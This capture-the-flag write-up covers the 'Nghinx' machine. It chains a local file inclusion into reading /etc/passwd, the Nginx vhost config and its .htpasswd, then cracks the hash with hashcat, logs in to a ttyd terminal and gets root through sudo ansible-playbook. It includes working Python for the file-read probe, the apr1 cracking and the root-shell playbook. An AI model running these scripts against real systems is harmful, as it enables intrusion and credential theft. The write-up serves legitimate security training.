
This machine CTF demonstrates how a local file inclusion (LFI) flaw, combined with a weak Nginx virtual-host setup whose basic-auth credential file is readable through that LFI, leads from anonymous web access to a root shell on the box.
Challenge Details
- Challenge Name: Nghinx
- Challenge Type: Machine
- Difficulty: Medium
- Points: 100
- Description:
“We've never been hacked, we probably have the most secure app so far.”
Initial Enumeration
When accessing the machine URL, we’re greeted with a blog homepage:
Clicking on “My first blog” redirects us to a .txt file, which throws an error:
Let's try removing the path from the redirection and accessing /etc/passwd instead:
We get a readable response, which confirms an arbitrary file read: the supplied path is opened as-is. Attempting /etc/shadow fails due to permission issues, so the read happens as an unprivileged user:
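The enumeration above, turned into a small probe, as an added example that is not code from the original writeup. It assumes (the page does not say) that the vulnerable page takes the file path in a query parameter, called `file` here as a hypothetical name, and returns the file's contents or the underlying OS error text in the body. The fake responses in the test are constructed.

```python
"""Systematic file read through the LFI found above.

Added example; not code from the original writeup. Assumptions not stated
on the page: the vulnerable endpoint takes the path in a query parameter
(hypothetical name "file") and returns the file's bytes in the body, with
the OS error text in the body when the read fails.
"""
import sys
import urllib.error
import urllib.parse
import urllib.request

# Files worth pulling once arbitrary read is confirmed; the last two are the
# Nginx vhost and the basic-auth credential file the writeup goes on to use.
TARGETS = [
    "/etc/passwd",
    "/etc/shadow",                          # expected to fail: not readable as the web user
    "/etc/nginx/nginx.conf",
    "/etc/nginx/sites-available/default",
    "/etc/nginx/.htpasswd",
]


def classify(status, body):
    """Turn one response into readable / denied / missing / unknown.

    Error markers are checked before the 200 check because a sloppy app will
    happily return HTTP 200 with "Permission denied" printed in the page.
    """
    if status == 403 or "Permission denied" in body:
        return "denied"
    if status == 404 or "No such file" in body:
        return "missing"
    if status == 200 and body.strip():
        return "readable"
    return "unknown"


def http_fetch(url):
    """Default fetcher: (status, body) using only the standard library."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def probe(base_url, param="file", targets=TARGETS, fetch=http_fetch):
    """Request every target through the LFI; returns {path: (verdict, body)}."""
    results = {}
    for path in targets:
        url = base_url + "?" + urllib.parse.urlencode({param: path})
        status, body = fetch(url)
        results[path] = (classify(status, body), body)
    return results


if __name__ == "__main__":
    # Usage: python lfi_probe.py http://<target>/<vulnerable-page>
    base = sys.argv[1] if len(sys.argv) > 1 else "http://target/blog"
    for path, (verdict, body) in probe(base).items():
        print(f"[{verdict:>8}] {path}")
        if verdict == "readable":
            print(body[:300])
```

The `fetch` parameter exists so the classification logic can be exercised against canned responses; against the real target, `probe(base)` with the default fetcher is all that is needed.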
Nginx Configuration Enumeration
Given the challenge name, we suspect this is running Nginx. Trying to access /etc/nginx/nginx.conf doesn't help:
However, reading /etc/nginx/sites-available/default gives us valuable information:
Nginx Configuration Snippet
    server {
        listen 80;
        location ~ ^/ttydremote(.*)$ {
            proxy_pass http://127.0.0.1:7681/$1;
            auth_basic "Restricted Access";
            auth_basic_user_file /etc/nginx/.htpasswd;
        }
        ...
    }
This tells us /ttydremote is reverse-proxied to a service on 127.0.0.1:7681 (the default port of ttyd, a web-based terminal) and is protected by HTTP basic auth using /etc/nginx/.htpasswd. That file must be readable by the Nginx worker, so it is a natural next target for our file read.
Cracking Credentials
We read the .htpasswd file and extract the hashed credentials:
Use Hashcat to crack the hash (mode 1600 is Apache's $apr1$ MD5, the format htpasswd writes by default):
sudo hashcat -m 1600 hash.txt /home/Ignite/Desktop/Tool/rockyou.txt
And we get:
- Username: username
- Password: password
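To show what hashcat is doing with the recovered file, here is an added example (not code from the writeup) that parses .htpasswd entries, maps each hash format to its hashcat mode, and checks candidates offline with a pure-Python implementation of the $apr1$ scheme. The sample entry and the tiny wordlist are constructed; the hash in the sample is generated by the block itself so it runs without real credential material.

```python
"""Triage and crack a recovered .htpasswd offline.

Added example; not code from the writeup. The sample entry and the tiny
wordlist are constructed for illustration (the real file is the one read
from /etc/nginx/.htpasswd, and the real wordlist is rockyou).
"""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """crypt(3)-style base64: 6 bits per character, least significant first."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def apr1_md5(password, salt):
    """Apache's $apr1$ scheme: md5-crypt with the magic string '$apr1$'."""
    pw, slt, magic = password.encode(), salt.encode(), b"$apr1$"
    ctx = hashlib.md5(pw + magic + slt)
    alt = hashlib.md5(pw + slt + pw).digest()
    for n in range(len(pw), 0, -16):          # mix in len(pw) bytes of the alternate sum
        ctx.update(alt[:min(16, n)])
    i = len(pw)
    while i:                                  # md5-crypt's bit-walk over the password length
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    digest = ctx.digest()
    for i in range(1000):                     # 1000 stretching rounds
        rnd = hashlib.md5()
        rnd.update(pw if i & 1 else digest)
        if i % 3:
            rnd.update(slt)
        if i % 7:
            rnd.update(pw)
        rnd.update(digest if i & 1 else pw)
        digest = rnd.digest()
    d = digest
    enc = (_to64(d[0] << 16 | d[6] << 8 | d[12], 4)
           + _to64(d[1] << 16 | d[7] << 8 | d[13], 4)
           + _to64(d[2] << 16 | d[8] << 8 | d[14], 4)
           + _to64(d[3] << 16 | d[9] << 8 | d[15], 4)
           + _to64(d[4] << 16 | d[10] << 8 | d[5], 4)
           + _to64(d[11], 2))
    return "$apr1$" + salt + "$" + enc


def parse_htpasswd(text):
    """Yield (user, hash) pairs, skipping blank lines and comments."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and ":" in line:
            user, h = line.split(":", 1)
            yield user, h


def hashcat_mode(h):
    """Hashcat -m value for each format htpasswd(1) can write."""
    if h.startswith("$apr1$"):
        return 1600       # Apache MD5, htpasswd's default (the mode used above)
    if h.startswith(("$2y$", "$2a$", "$2b$")):
        return 3200       # bcrypt, htpasswd -B
    if h.startswith("{SHA}"):
        return 101        # base64 SHA-1, htpasswd -s
    if len(h) == 13:
        return 1500       # traditional DES crypt, htpasswd -d
    return None           # plaintext (htpasswd -p) or unknown


def crack_apr1(h, candidates):
    """Check candidates against one $apr1$ hash; returns the match or None."""
    _, _, salt, _ = h.split("$", 3)
    for cand in candidates:
        if apr1_md5(cand, salt) == h:
            return cand
    return None


def triage(text, wordlist):
    """{user: (hashcat mode, cracked password or None)} for every entry."""
    report = {}
    for user, h in parse_htpasswd(text):
        mode = hashcat_mode(h)
        found = crack_apr1(h, wordlist) if mode == 1600 else None
        report[user] = (mode, found)
    return report


# Constructed sample in the shape of the recovered file; the hash is generated
# here so the demo runs without any real credential material.
SAMPLE_HTPASSWD = "# ttyd access\nwebadmin:" + apr1_md5("sunshine1", "kD7pQx2v") + "\n"
SAMPLE_WORDLIST = ["123456", "password", "sunshine1", "letmein"]

if __name__ == "__main__":
    for user, (mode, pw) in triage(SAMPLE_HTPASSWD, SAMPLE_WORDLIST).items():
        print(f"{user}: hashcat -m {mode}; cracked: {pw}")
```

For a real rockyou run the pure-Python loop is far too slow (1000 MD5 rounds per guess); its job here is to show the format and to confirm a cracked candidate. Hashcat can consume the user:hash lines directly with `hashcat -m 1600 --username htpasswd.txt rockyou.txt`, which avoids hand-editing the hash file.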
Gaining Access
Accessing /ttydremote prompts for credentials. We use the cracked ones:
Now we're inside the system as a low-privileged user, in the ttyd web terminal that Nginx proxies from port 7681.
Privilege Escalation
Running sudo -l reveals we can execute ansible-playbook with sudo:
Check GTFOBins for escalation steps:
Execute the suggested commands: ansible-playbook runs a playbook's tasks as the invoking user, which under sudo is root, so a single shell task gives a root shell. Grab the flag from there.
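The GTFOBins ansible-playbook technique, as an added example that is not code from the writeup. It writes the same single-task play the GTFOBins sudo entry uses (a `shell` task that execs /bin/sh on the controlling tty), with fact gathering disabled as a small addition so the shell appears immediately, and runs it through the sudo right that `sudo -l` reported.

```python
"""Root shell through `sudo ansible-playbook`.

Added example; not code from the writeup. It follows the GTFOBins entry for
ansible-playbook: a play with one `shell` task that execs /bin/sh on the
controlling tty. Tasks run as the user invoking ansible-playbook, which under
sudo is root, so the spawned shell is a root shell.
"""
import json
import os
import subprocess
import tempfile


def build_playbook():
    """The minimal play: one shell task wired to the terminal."""
    return [{
        "hosts": "localhost",
        "gather_facts": False,         # skip fact gathering so the shell appears at once
        "tasks": [{
            "name": "spawn root shell",
            "shell": "/bin/sh </dev/tty >/dev/tty 2>/dev/tty",
        }],
    }]


def write_playbook(directory=None):
    """Write the play to a temp file and return its path (JSON is valid YAML)."""
    fd, path = tempfile.mkstemp(suffix=".yml", dir=directory)
    with os.fdopen(fd, "w") as fh:
        json.dump(build_playbook(), fh)
    return path


def escalate():
    """Run the play with the sudo right that `sudo -l` showed; blocks until the shell exits."""
    path = write_playbook()
    try:
        subprocess.run(["sudo", "ansible-playbook", path], check=False)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    escalate()
```

If `sudo -l` restricts the rule to a specific ansible-playbook path, invoke that exact path in `escalate()`; the play file itself can live anywhere the low-privileged user can write.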
Final Flag
We navigate to /root and retrieve the flag:
Flag{QCFAb2I1MlNaY1lld2dyUElDMVNIeU5sZz09ZjU0MjhiMmZlN2MwZmViOA==}
We are done, great job everyone! 👏